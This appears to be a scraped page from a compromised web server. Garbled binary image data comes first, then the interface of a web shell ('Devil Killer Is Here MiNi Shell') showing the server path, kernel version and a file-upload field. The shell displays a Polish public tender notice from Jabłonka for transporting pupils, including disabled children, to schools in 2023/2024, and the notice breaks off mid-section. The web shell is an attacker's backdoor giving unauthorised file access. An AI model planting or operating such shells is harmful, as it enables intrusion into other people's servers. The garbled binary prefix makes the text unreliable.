JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230818/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230818/0035873701-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz uczn. z terenu Gminy Jabłonka do Katolickiej Szk. Podst. , Szkoły Specj. Przysp. do Pracy, Branż. Szk. I St. Specj.<br/>SPSK w Czerwiennem oraz SP Specj. Nr 9 w Nowym Targu w roku szk. 2023/2024 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Centrum Usług Wspólnych w Jabłonce</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 492902313</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">3-go Maja 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jabłonka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">34-480</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL219 - Nowotarski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuro@cuwjablonka.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.cuwjablonka.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz uczn. z terenu Gminy Jabłonka do Katolickiej Szk. Podst. , Szkoły Specj. Przysp. do Pracy, Branż. Szk. I St. Specj.<br/>SPSK w Czerwiennem oraz SP Specj. Nr 9 w Nowym Targu w roku szk. 2023/2024 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7d337dc7-3db7-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00358737</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-08-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00078751/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Dowóz uczn. z terenu Gminy Jabłonka do Katolickiej Szk. Podst. , Szkoły Specj. Przysp. do Pracy, Branż. Szk. I St. Specj. SPSK w Czerwiennem oraz SP Specj. Nr 9 w Nowym Targu w roku szk. 2023/2024</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-7d337dc7-3db7-11ee-a60c-9ec5599dddc1 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie zamówienia publicznego komunikacja między<br/>Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem<br/>https://ezamowienia.gov.pl.<br/>2. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>4. Adres strony internetowej prowadzonego postępowania (link prowadzący<br/>bezpośrednio do widoku postępowania na Platformie e-Zamówienia):<br/>https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-7d337dc7-3db7-11ee-a60c-9ec5599dddc1<br/>Postępowanie można wyszukać również ze strony głównej Platformy e-Zamówienia<br/>(przycisk „Przeglądaj postępowania/konkursy”).<br/>5. Identyfikator (ID) postępowania na Platformie e-Zamówienia:<br/>ocds-148610-7d337dc7-3db7-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która<br/>jest dostępna pod adresem https://ezamowienia.gov.pl.<br/>2. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>4. Adres strony internetowej prowadzonego postępowania (link prowadzący<br/>bezpośrednio do widoku postępowania na Platformie e-Zamówienia):<br/>https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-7d337dc7-3db7-11ee-a60c-9ec5599dddc1<br/>5. Identyfikator (ID) postępowania na Platformie e-Zamówienia:<br/>ocds-148610-7d337dc7-3db7-11ee-a60c-9ec5599dddc1<br/>6. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści<br/>zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa<br/>Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/>7. Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla<br/>dokumentów elektronicznych, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach<br/>rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, z uwzględnieniem rodzaju przekazywanych danych i<br/>przekazuje się jako załączniki.<br/>W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacje nie będą miały bezpośredniego zastosowania.<br/>8. Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie<br/>wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>a. w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (i<br/>przekazuje się jako załącznik), lub<br/>b. jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści<br/>wiadomości e-mail lub w treści „Formularza do komunikacji”).<br/>9. Komunikacja w postępowaniu, z wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, odbywa się<br/>drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do<br/>komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień,<br/>zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej<br/>wiadomości (przycisk „dodaj załącznik”).<br/>10. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta<br/>„Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do<br/>komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta<br/>uproszczonego na Platformie e-Zamówienia.<br/>11. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>postępowania w zakładce „Komunikacja”.<br/>12. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>13. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>14. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail:<br/>biuro@cuwjablonka.pl (nie dotyczy składania ofert/wniosków o dopuszczenie do udziału w postępowaniu).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">administratorem Pani/Pana danych osobowych jest Dyrektor Centrum Usług Wspólnych w<br/>Jabłonce, ul. 3 – go Maja 1, 34 – 480 Jabłonka;<br/>• Kontakt z inspektorem ochrony danych osobowych w Centrum Usług Wspólnych kontakt: e-mail: iod_cuw@jablonka.pl, telefon<br/>18/2611153;<br/>• Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego /dane identyfikujące postępowanie, np. nazwa, numer/ prowadzonym w trybie przetargu<br/>nieograniczonego nr CUW.26.4.3.2023 „Dowóz uczniów z terenu Gminy Jabłonka do Katolickiej Szkoły Podstawowej SPSK, Szkoły<br/>Specjalnej Przysposabiającej do Pracy SPSK, Branżowej Szkoły I Stopnia Specjalnej SPSK w Czerwiennem oraz Szkoły<br/>Podstawowej Specjalnej Nr 9 w Zespole Placówek Szkolno-Wychowawczo Opiekuńczych<br/>w Nowym Targu w roku szkolnym 2023/2024”.<br/>• odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2022 r. poz. 1710 z późn.<br/>zm.), dalej „ustawa Pzp”;<br/>• dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały okres<br/>obowiązywania umowy lub dłuższym, jeżeli wynika to z odrębnych przepisów; Okresy te dotyczą również Wykonawców, którzy<br/>złożyli oferty i nie zostały one uznane, jako najkorzystniejsze (nie zawarto z tymi Wykonawcami umowy).<br/>• obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>• w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO;<br/>• posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">• nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">CUW.26.4.3.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest „Dowóz uczniów z terenu Gminy Jabłonka do Katolickiej Szkoły Podstawowej SPSK,<br/>Szkoły Specjalnej Przysposabiającej do Pracy SPSK, Branżowej Szkoły I Stopnia Specjalnej SPSK w Czerwiennem oraz<br/>Szkoły Podstawowej Specjalnej Nr 9 w Zespole Placówek Szkolno-Wychowawczo Opiekuńczych w Nowym Targu w roku<br/>szkolnym 2023/2024”.<br/>2. Zakres rzeczowy zamówienia obejmuje wykonanie przewozu uczniów na trasach:<br/>2.1. Część nr 1 „Dowóz uczniów z terenu Gminy Jabłonka do Katolickiej Szkoły Podstawowej SPSK, Szkoły Specjalnej<br/>Przysposabiającej do Pracy SPSK, Branżowej Szkoły I Stopnia Specjalnej SPSK w Czerwiennem<br/>w roku szkolnym 2023/2024”.<br/>Wykaz przystanków:<br/>a) Lipnica Mała 259,448<br/>b) Zubrzyca Dolna 105<br/>c) Orawka 115<br/>d) Jabłonka „Za Górą” okolice ul. Uroczej 2, ul. Ks. F. Machaja 36, ul. Kamieniec 22<br/>e) przystanek ostatni – Katolicka Szkoła Podstawowa w Czerwiennem SPSK, Szkoła Specjalna Przysposabiającej do Pracy<br/>SPSK w Czerwiennem oraz Branżowa Szkoły I Stopnia Specjalnej SPSK w Czerwiennem (Adres szkół 34-407 Czerwienne<br/>245)<br/>f) do wykonania 2 kursy dziennie (1- rano, 1- popołudniu)<br/>g) 1 kurs około 63,5 km, szacunkowa ilość kilometrów dowozów w dniach nauki szkolnej – ok 127 km/dziennie x 186 dni =<br/>23622 km<br/>h) przewóz 7 uczniów (w tym 1 dziecko na wózku inwalidzkim (rozłożonym). Pojazd do przewozu winien być wyposażony<br/>dodatkowo w urządzenie umożliwiające wprowadzenie wózka do pojazdu (platforma najazdowa) oraz mocowanie dla wózka<br/>na czas trwania przewozu) + 1 opiekun; wg harmonogramu zajęć lekcyjnych<br/>i) dowóz uczniów na godz. 9.00, powrót między godz. 13.00-16.00 – zgodnie z harmonogramem zajęć lekcyjnych.<br/>Usługi przewozowe należy wykonywać zgodnie z ustalonym harmonogramem dostosowanym do planu nauczania danej<br/>placówki oświatowej.<br/>3.Dni dowozów w roku szkolnym 2023/2024 w okresie od 4 września 2023 roku do 21 czerwca 2024 roku – 186 dni przy<br/>czym gwarantowana ilość dni w których będzie świadczona usługa dowozu/odwozu, wynosi 93 dni.<br/>Dzienną liczbę przejechanych kilometrów w ramach wykonywania przedmiotu zamówienia ustal się na około 127 km na<br/>trasie do Czerwiennego oraz 127 km na trasie do Nowego Targu. Liczba kilometrów, o której mowa wyżej może ulec<br/>zmianie ze względu na zmianę przebiegu trasy w przypadku zgłoszenia (bądź rezygnacji) przez rodziców/opiekunów<br/>prawnych dzieci do dowozu.<br/>Długości tras przewozu liczone są od przystanków początkowych. Koszty dojazdu Wykonawcy do miejsca rozpoczęcia trasy<br/>i zjazdu po zakończeniu dowozu nie mogą obciążać Zamawiającego.<br/>W przypadku wystąpienia silnych opadów śniegu lub innych zjawisk atmosferycznych uniemożliwiających dojazd, w<br/>porozumieniu z Zamawiającym oraz Dyrektorem szkoły mogą nastąpić przesunięcia godzin dowozu i odwozu dzieci.<br/>W przypadku remontów, awarii, uszkodzeń mostów, dróg lub innych obiektów czego skutkiem będzie zmiana lub<br/>konieczność zmiany trasy przewozowych (w tym także wydłużenie trasy lub skrócenie trasy ze względu na zmianę ilości<br/>dowożonych dzieci), Zamawiający dopuszcza możliwość zmiany umowy i należnego (tak zwiększenia jak i zmniejszenia)<br/>wynagrodzenia na podstawie ceny ofertowej Wykonawcy za 1 km.<br/>Podana liczba uczniów ma charakter orientacyjny i może ulec zmianie w trakcie realizacji zamówienia (może ulec<br/>zwiększeniu lub zmniejszeniu).<br/>Opcja zwiększenia ilości dowożonych dzieci będzie miała zastosowanie w przypadku zgłoszenia przez rodziców/opiekunów<br/>prawnych nowych dzieci do dowozu.<br/>Wykonawca zobowiązany jest wielkość pojazdu dostosować do uwarunkowań przedmiotowej usługi.<br/>Cena oferty powinna uwzględniać koszt dojazdu do miejsca rozpoczęcia wykonywania usługi.<br/>Wskazano przystanki najdalsze – dzieci zabierane są na odcinkach pomiędzy przystankami.<br/>Wykonawca zobowiązany jest świadczyć usługi w taki sposób, aby czas przebywania uczniów w podróży był jak najkrótszy,<br/>a nadto winien uwzględnić to, aby przewożeniu uczniowie mogli punktualnie rozpocząć zajęcia lekcyjne i bez zbędnego<br/>oczekiwania na nie, a nadto aby po ich zakończeniu byli odwożeni bez zbędnego oczekiwania. Usługi przewozowe będą<br/>odbywać się najkrótszą trasą z domu do szkoły i po skończonych zajęciach lekcyjnych ze szkoły do domu.<br/>Świadczenie usług przewozowych polegających na dowozie dzieci i młodzieży niepełnosprawnej musi być wykonywane<br/>pojazdami specjalistycznymi dostosowanymi do przewozu osób niepełnosprawnych, w tym osób na wózkach inwalidzkich.<br/>Dostosowanie pojazdów do przewozu osób niepełnosprawnych oraz ich oznaczenie musi być zgodnie z obowiązującymi w<br/>tym zakresie przepisami prawnymi. Pojazdy, którymi przewożone będą dzieci muszą być w pełni sprawne technicznie,<br/>dostosowane do ilości przewożonych dzieci i posiadającymi świadectwo dopuszczenia do ruchu – wydane zgodnie z<br/>Prawem o ruchu drogowym. Pojazdy mają być oznaczone zgodnie z obowiązującym Rozporządzeniem w sprawie rejestracji<br/>i oznaczania pojazdów oraz wymagań dla tablic rejestracyjnych (Dz.U. z 2017 r., poz. 2355 z późn. zm.). Każdy pojazd ma posiadać ubezpieczenie OC i NNW, ma być utrzymany w czystości, sprawny technicznie. W zimie każdy pojazd ma być<br/>ogrzewany, odśnieżony, a wejścia do niego oczyszczone z ewentualnego oblodzenia, tak by były one bezpieczne.<br/>W przypadku wystąpienia awarii pojazdu lub w przypadku stwierdzenia przez Zamawiającego lub policję niesprawności<br/>pojazdu, która zagraża bezpieczeństwu osób przewożonych Wykonawca zobowiązany jest do niezwłocznego podstawienia<br/>pojazdu zastępczego do dalszej realizacji zamówienia. Pojazd zastępczy winien być podstawiony w czasie zgodnym z<br/>czasem podanym przez Wykonawcę w ofercie przetargowej. W przypadku przekroczenia tego terminu Wykonawcy zostaną<br/>naliczone kary umowne za nie przestrzeganie warunków umowy.<br/>Wykonawca zobowiązany jest posiadać w gotowości pojazd zastępczy, który może zostać użyty w przypadku wystąpienia<br/>awarii innego pojazdu, którym świadczona jest usługa dowozu.<br/>Wykonawcy ponoszą wyłączną odpowiedzialność za zapoznanie się z należytą starannością z treścią specyfikacji istotnych<br/>warunków zamówienia dostępną na stronie internetowej Zamawiającego.<br/>Przewóz uczniów do placówek szkolnych odbywać się będzie w dni nauki szkolnej, w oparciu o Rozporządzenie Ministra<br/>Edukacji Narodowej i Sportu z 18 kwietnia 2002 r. w sprawie organizacji roku szkolnego (Dz. U. Nr 46, poz. 432 z 2002 r. z<br/>późn. zm.) z wyłączeniem przerw świątecznych i innych dni wolnych od zajęć wynikających z organizacji roku szkolnego.<br/>Wykonawca zobowiązany będzie zapewnić transport również w dni, w które uczniowie będą odrabiali inne dni zwolnione z<br/>nauki szkolnej.<br/>Dowóz będzie się odbywał w dni robocze wynikające z zajęć szkolnych<br/>Dowóz nie będzie realizowany w czasie ferii. Zaś w dni wolne od zajęć dydaktycznych dowóz będzie organizowany na<br/>życzenie rodziców (np. sprawdzianów, egzaminów oraz w inne dodatkowe wolne dni od zajęć szkolnych, itp.).<br/>CPV<br/>przedmiot główny:<br/>60100000-9 - Usługi w zakresie transportu drogowego<br/>przedmioty dodatkowe:<br/>60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">186 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający przy wyborze najkorzystniejszej oferty będzie kierował się<br/>następującymi kryteriami:<br/>a) Kryterium „cena” (Kc) – 60 pkt<br/>b) Kryterium „czas podstawienia pojazdu zastępczego” (Kpz) – 40 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania 